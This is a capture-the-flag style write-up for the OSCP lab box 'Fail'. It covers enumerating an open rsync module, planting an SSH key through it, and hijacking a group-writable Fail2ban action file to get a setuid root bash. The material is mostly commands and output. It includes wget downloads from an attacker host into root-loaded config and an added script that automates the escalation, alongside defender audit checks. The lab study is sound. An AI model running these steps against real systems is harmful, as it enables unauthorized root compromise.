OSCP lab -- Fail


Key points: an unauthenticated, writable rsync module is used to plant an SSH public key, then Fail2ban is abused for privilege escalation.

1. nmap scan

##
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC 192.168.153.126 -p- -Pn --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-12 23:34 EDT
Warning: 192.168.153.126 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.153.126
Host is up (0.14s latency).
Not shown: 64874 closed tcp ports (reset), 659 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
873/tcp open  rsync   (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.83 seconds

2. User access

2.1 Reading files over rsync:

##
## Enumerate the shared modules:
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV --script "rsync-list-modules" -p 873 192.168.153.126
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-13 02:37 EDT
Nmap scan report for 192.168.153.126
Host is up (0.23s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
| rsync-list-modules: 
|_  fox                 fox home

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds
## List the shared fox directory (the module is fox's home, so anything written here lands in that home):
┌──(root㉿kali)-[~/Desktop]
└─# rsync -av --list-only rsync://192.168.153.126/fox
receiving incremental file list
drwxr-xr-x          4,096 2021/01/21 09:21:59 .
lrwxrwxrwx              9 2020/12/03 15:22:42 .bash_history -> /dev/null
-rw-r--r--            220 2019/04/18 00:12:36 .bash_logout
-rw-r--r--          3,526 2019/04/18 00:12:36 .bashrc
-rw-r--r--            807 2019/04/18 00:12:36 .profile
## Copy the files to Kali:
┌──(root㉿kali)-[~/Desktop]
└─# rsync -av rsync://192.168.153.126/fox ./fox
receiving incremental file list
created directory ./fox
./
.bash_history -> /dev/null
.bash_logout
.bashrc
.profile

sent 87 bytes  received 4,828 bytes  1,404.29 bytes/sec
total size is 4,562  speedup is 0.93

┌──(root㉿kali)-[~/Desktop]
└─# cd fox

┌──(root㉿kali)-[~/Desktop/fox]
└─# tree ./ -al
./
├── .bash_history -> /dev/null
├── .bash_logout
├── .bashrc
└── .profile

0 directories, 4 files
## Nothing useful in those files (.bash_history is a symlink to /dev/null).
## Next: since the module may be writable, try pushing a public key into ~/.ssh.

2.2 Generate a key pair and upload the public key over rsync

##
┌──(root㉿kali)-[~/.ssh]
└─# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:wi6MXgWaQG35nP0zkaRVc8+x7Vx17Z6Z3NGa9NyIgjo root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .. .     .o . .+|
|.  +     o  o o B|
|. . + o + .    =+|
| . o * o o    .++|
|  o   + S..  o.BX|
|   o o ..+. . +=*|
|  . + ..  o.     |
| . . .E          |
|  .    .         |
+----[SHA256]-----+
##
┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa.pub >> authorized_keys

┌──(root㉿kali)-[~/.ssh]
└─# ls -al
total 32
drwx------  2 root root 4096 Apr 13 03:03 .
drwx------ 27 root root 4096 Apr 13 02:36 ..
-rw-r--r--  1 root root  563 Apr 13 03:03 authorized_keys
-rw-------  1 root root 2590 Apr 13 02:58 id_rsa
-rw-r--r--  1 root root  563 Apr 13 02:58 id_rsa.pub
-rw-------  1 root root 4458 Apr 13 03:02 known_hosts
-rw-------  1 root root 3952 Apr 12 04:17 known_hosts.old
## Upload the public key (the module accepts writes, so this creates /home/fox/.ssh on the target):
┌──(root㉿kali)-[~/.ssh]
└─# rsync -av /root/.ssh/ rsync://192.168.153.126/fox/.ssh
sending incremental file list
./
authorized_keys
known_hosts

sent 1,132 bytes  received 99 bytes  223.82 bytes/sec
total size is 12,126  speedup is 9.85
## Note: syncing the whole ~/.ssh directory also ships id_rsa, id_rsa.pub and known_hosts to the target; only authorized_keys is needed. What made this work is -a (archive mode), which preserved the 0700 directory mode from Kali: sshd's StrictModes (on by default) ignores an authorized_keys file whose directory or file is group/world-writable.
## Log in with the private key:
┌──(root㉿kali)-[~/.ssh]
└─# ssh -i id_rsa fox@192.168.153.126                     
Linux fail 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
fox
$ 
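A cleaner way to do the same upload, added here as an example (this is not code from the original writeup): stage only an authorized_keys file locally with the modes sshd expects and push that directory into the module, so the private key and known_hosts never reach the target. The host, module and user are the ones from the scan; the staging layout, the dry-run check and the environment variables are my assumptions.

```shell
#!/usr/bin/env bash
# Added example: push only an authorized_keys file into a writable rsync module.
# Assumes the target/module from the writeup (192.168.153.126, module "fox" =
# fox's home). PUBKEY defaults to the key generated above. Nothing here touches
# the network unless push_key is called.
set -eu

TARGET="${TARGET:-192.168.153.126}"
MODULE="${MODULE:-fox}"
PUBKEY="${PUBKEY:-${HOME:-/root}/.ssh/id_rsa.pub}"

# Build a staging tree that mirrors the remote home: .ssh/ (0700) and
# .ssh/authorized_keys (0600). rsync -a preserves these modes, which matters:
# sshd's StrictModes (on by default) ignores authorized_keys whose directory or
# file is group/world-writable.
stage_key() {            # stage_key <stage_dir> <pubkey_file>  -> prints the staged file
    local stage="$1" pub="$2"
    umask 077
    mkdir -p "$stage/.ssh"
    chmod 700 "$stage/.ssh"
    # Keep only the public key line; never copy id_rsa or known_hosts.
    grep -E '^(ssh-(rsa|ed25519)|ecdsa-sha2-nistp[0-9]+) ' "$pub" > "$stage/.ssh/authorized_keys"
    chmod 600 "$stage/.ssh/authorized_keys"
    printf '%s\n' "$stage/.ssh/authorized_keys"
}

# Dry run first: the daemon refuses a push into a read-only module before any
# transfer, so this fails fast without touching anything. Then the real push.
push_key() {             # push_key <stage_dir>  -> prints the ssh command to use
    local stage="$1"
    rsync -a --dry-run "$stage/" "rsync://$TARGET/$MODULE/" \
        || { echo "module $MODULE is not writable" >&2; return 1; }
    rsync -a "$stage/" "rsync://$TARGET/$MODULE/"
    printf 'ssh -i %s %s@%s\n' "${PUBKEY%.pub}" "$MODULE" "$TARGET"
}

# Usage (network step only when RUN_PUSH=1):
#   stage=$(mktemp -d); stage_key "$stage" "$PUBKEY"; RUN_PUSH=1 push_key "$stage"
if [ "${RUN_PUSH:-0}" = 1 ]; then
    stage=$(mktemp -d)
    stage_key "$stage" "$PUBKEY"
    push_key "$stage"
fi
```

The module here is the home directory itself, so the staging tree starts at `.ssh`; if a module only exposes a subdirectory, the staging path has to be adjusted to wherever `~/.ssh` ends up relative to the module root.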

3. Root privileges [Fail2ban privilege escalation]

##
## linpeas enumeration:
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
  Group fail2ban:
/etc/fail2ban/action.d                                                                                                               
/etc/fail2ban/action.d/firewallcmd-ipset.conf
/etc/fail2ban/action.d/nftables-multiport.conf
/etc/fail2ban/action.d/firewallcmd-multiport.conf
/etc/fail2ban/action.d/mail-whois.conf
/etc/fail2ban/action.d/ufw.conf
#)You_can_write_even_more_files_inside_last_directory
##
## Watch for scheduled jobs with pspy64:
fox@fail:/tmp$ wget http://192.168.45.195/pspy64
fox@fail:/tmp$ chmod +x ./pspy64
fox@fail:/tmp$ ./pspy64
## A root job launches fail2ban-server once a minute. fail2ban reads /etc/fail2ban (including action.d) when it starts or is told to reload, so a modified action file takes effect at the next start without us restarting anything:
2024/04/13 03:35:02 CMD: UID=0     PID=14259  | /usr/bin/python3 /usr/bin/fail2ban-server -xf start
##
## Look at the script: fox has no write permission on it (root-owned, 0755), so the script itself is not the target; the configuration it loads is.
fox@fail:/tmp$ ls -l /usr/bin/fail2ban-server
-rwxr-xr-x 1 root root 1419 Sep 23  2018 /usr/bin/fail2ban-server
fox@fail:/tmp$ cat /usr/bin/fail2ban-server
#!/usr/bin/python3
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*-
# vi: set ft=python sts=4 ts=4 sw=4 noet :

# This file is part of Fail2Ban.
#
# Fail2Ban is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Fail2Ban is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fail2Ban; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

"""
Fail2Ban reads log file that contains password failure report
and bans the corresponding IP addresses using firewall rules.

This tools starts/stops fail2ban server or does client/server communication,
to change/read parameters of the server or jails.
"""

__author__ = "Fail2Ban Developers"
__copyright__ = "Copyright (c) 2004-2008 Cyril Jaquier, 2012-2014 Yaroslav Halchenko, 2014-2016 Serg G. Brester"
__license__ = "GPL"

from fail2ban.client.fail2banserver import exec_command_line, sys

if __name__ == "__main__":
	exec_command_line(sys.argv)
##
fox@fail:/tmp$ id
uid=1000(fox) gid=1001(fox) groups=1001(fox),1000(fail2ban)
##
## fox is in the fail2ban group, and linpeas showed that /etc/fail2ban/action.d itself is group-writable (its file list was cut off at "You_can_write_even_more_files_inside_last_directory"). Write access to the directory is enough to replace any file in it, even one we could not open for writing. The file to target is iptables-multiport.conf: it is the default banaction in jail.conf, so it is what the sshd jail actually loads. Overwrite it with a version whose actionban runs our command:
fox@fail:/tmp$ wget http://192.168.45.195/1.txt -O /etc/fail2ban/action.d/iptables-multiport.conf
--2024-04-13 04:24:13--  http://192.168.45.195/1.txt
Connecting to 192.168.45.195:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 498 [text/plain]
Saving to: ‘/etc/fail2ban/action.d/iptables-multiport.conf’

/etc/fail2ban/actio 100%[===================>]     498  --.-KB/s    in 0s

utime(/etc/fail2ban/action.d/iptables-multiport.conf): Operation not permitted
2024-04-13 04:24:14 (112 MB/s) - ‘/etc/fail2ban/action.d/iptables-multiport.conf’ saved [498/498]
## The utime error is harmless: the content was written, wget just cannot set timestamps on a file fox does not own.

fox@fail:/tmp$ cat /etc/fail2ban/action.d/iptables-multiport.conf
# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified by Yaroslav Halchenko for multiport banning
#

[INCLUDES]

before = iptables-common.conf

[Definition]

# Option:  actionstart
# Notes.:  command executed once at the start of Fail2Ban.
# Values:  CMD
#
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port>
actionban = cp /bin/bash /tmp && chmod 4755 /tmp/bash
## Only actionban matters: fail2ban runs it as root, with the <...> tags substituted, the first time the sshd jail bans an address.
## Because the iptables call was removed from actionban, the "banned" address (our Kali box) is never actually blocked, so the SSH session we already hold survives the ban.
fox@fail:/tmp$ ls -al
total 3880
drwxrwxrwt  9 root root    4096 Apr 13 03:31 .
drwxr-xr-x 18 root root    4096 Nov 19  2020 ..
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .font-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .ICE-unix
-rwxr-xr-x  1 fox  fox   830030 Jun  8  2023 linpeas.sh
-rwxr-xr-x  1 fox  fox  3104768 Oct 15 16:07 pspy64
drwx------  3 root root    4096 Mar 23 05:54 systemd-private-ed6103b5cc954113b252ce1682f5f3f9-systemd-timesyncd.service-YHAVrn
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .Test-unix
drwx------  2 root root    4096 Mar 23 05:54 vmware-root_307-2117352714
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .XIM-unix
## Trigger the ban from Kali with a burst of failed SSH logins (the author used hydra). Once the next fail2ban start has loaded the new action file and the sshd jail bans the Kali IP, actionban runs as root and the setuid copy appears:
fox@fail:/tmp$ ls -al
total 5024
drwxrwxrwt  9 root root    4096 Apr 13 04:25 .
drwxr-xr-x 18 root root    4096 Nov 19  2020 ..
-rwsr-xr-x  1 root root 1168776 Apr 13 04:26 bash
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .font-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .ICE-unix
-rwxr-xr-x  1 fox  fox   830030 Jun  8  2023 linpeas.sh
-rwxr-xr-x  1 fox  fox  3104768 Oct 15 16:07 pspy64
drwx------  3 root root    4096 Mar 23 05:54 systemd-private-ed6103b5cc954113b252ce1682f5f3f9-systemd-timesyncd.service-YHAVrn
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .Test-unix
drwx------  2 root root    4096 Mar 23 05:54 vmware-root_307-2117352714
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .XIM-unix
## -p stops bash from dropping the effective uid it inherited from the setuid bit:
fox@fail:/tmp$ ./bash -p
bash-5.0# id
uid=1000(fox) gid=1001(fox) euid=0(root) groups=1001(fox),1000(fail2ban)
bash-5.0# cat /root/proof.txt
67881fb0ba414792fb7abf861095ea55
bash-5.0# 
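The whole fail2ban step collected into one script, added as an example that is not part of the original writeup. It writes the action file, generates the failed logins with hydra the way the author did, polls for the setuid copy, and adds the two checks a defender would run on the same host: actionban values that never reference the banned address, and files under action.d writable by anyone but root. Target, user and payload are the writeup's; ACTION_DIR, the hydra flags and the attempt count (Debian's sshd jail bans after maxretry=5 within findtime=10m) are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup. write_action_file drops the
# action file whose actionban runs as root; trigger_ban produces the failed
# logins from Kali (hydra, as the author did); wait_for_root_shell polls for
# the setuid copy. audit_action_dir and audit_perms are the defender-side
# checks for the same weakness. Target, user and payload come from the
# writeup; ACTION_DIR, the attempt count and the hydra flags are assumptions.
set -eu

TARGET="${TARGET:-192.168.153.126}"
F2B_USER="${F2B_USER:-fox}"
ACTION_DIR="${ACTION_DIR:-/etc/fail2ban/action.d}"
PAYLOAD='cp /bin/bash /tmp/bash && chmod 4755 /tmp/bash'

# Minimal replacement for iptables-multiport.conf (Debian's default banaction,
# so the sshd jail loads it). Every key except actionban is left empty, which
# fail2ban accepts; nothing here ever inserts a firewall rule, so the address
# that gets "banned" (our own) is never actually blocked.
write_action_file() {    # write_action_file <dir>  -> prints the file written
    local f="$1/iptables-multiport.conf"
    cat > "$f" <<EOF
[Definition]
actionstart =
actionstop =
actioncheck =
actionban = $PAYLOAD
actionunban =
EOF
    printf '%s\n' "$f"
}

# Enough failed SSH logins from this host to trip the jail: maxretry (5 on
# Debian) within findtime (10 min). Junk passwords; we want failures, not a hit.
trigger_ban() {          # trigger_ban [attempts]   (run on Kali)
    local n="${1:-6}" pw
    pw=$(mktemp)
    seq 1 "$n" | sed 's/^/not-the-password-/' > "$pw"
    hydra -I -q -t 1 -l "$F2B_USER" -P "$pw" "ssh://$TARGET" || true
    rm -f "$pw"
}

# fail2ban only reads action.d when it starts. On this box a root job starts
# fail2ban-server every minute, so: write the file, wait for the next start,
# then trigger. The setuid copy shows up right after the ban.
wait_for_root_shell() {  # wait_for_root_shell [timeout_seconds]
    local t="${1:-180}"
    while [ "$t" -gt 0 ]; do
        if [ -u /tmp/bash ]; then printf '%s\n' '/tmp/bash -p'; return 0; fi
        sleep 5; t=$((t - 5))
    done
    return 1
}

# Defender check 1: a real ban action must mention the banned address, so an
# actionban with no <ip> tag is almost certainly hijacked. (Heuristic: only the
# first line of a multi-line actionban is inspected.)
audit_action_dir() {     # audit_action_dir <dir>  -> prints suspicious files
    local f cmd
    for f in "$1"/*.conf; do
        [ -e "$f" ] || continue
        cmd=$(sed -n 's/^actionban[[:space:]]*=[[:space:]]*//p' "$f" | head -n 1)
        [ -n "$cmd" ] || continue
        case "$cmd" in
            *'<ip>'*) ;;
            *) printf '%s: actionban = %s\n' "$f" "$cmd" ;;
        esac
    done
}

# Defender check 2: nothing under action.d should be writable by group or
# others; fail2ban runs these files' commands as root.
audit_perms() {          # audit_perms <dir>  -> prints group/world-writable paths
    find "$1" \( -perm -g=w -o -perm -o=w \) -print
}

# Usage on the target (as fox), then from Kali:
#   write_action_file "$ACTION_DIR"; sleep 70   # let the root job restart fail2ban
#   trigger_ban                                   # this one runs on Kali
#   wait_for_root_shell && /tmp/bash -p
```

The order matters: write the file first, give the minute-ly root job time to start fail2ban-server with the new configuration, and only then produce the failed logins. Triggering before the restart only bans you under the stock action, which inserts a real REJECT rule for your address.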

Fail2ban privilege escalation, in short: fox's group can write /etc/fail2ban/action.d; a root job starts fail2ban-server every minute, so the replaced iptables-multiport.conf is loaded; hydra is run from Kali to produce failed SSH logins, Fail2Ban bans the Kali IP and executes actionban as root; actionban leaves a setuid copy of bash in /tmp, and ./bash -p gives the root shell.

4. Summary and references:

## rsync pentesting
https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync
## writeup:
https://dylanrholloway.com/proving-grounds-fail-write-up/
## Fail2ban privilege escalation:
https://juggernaut-sec.com/fail2ban-lpe/
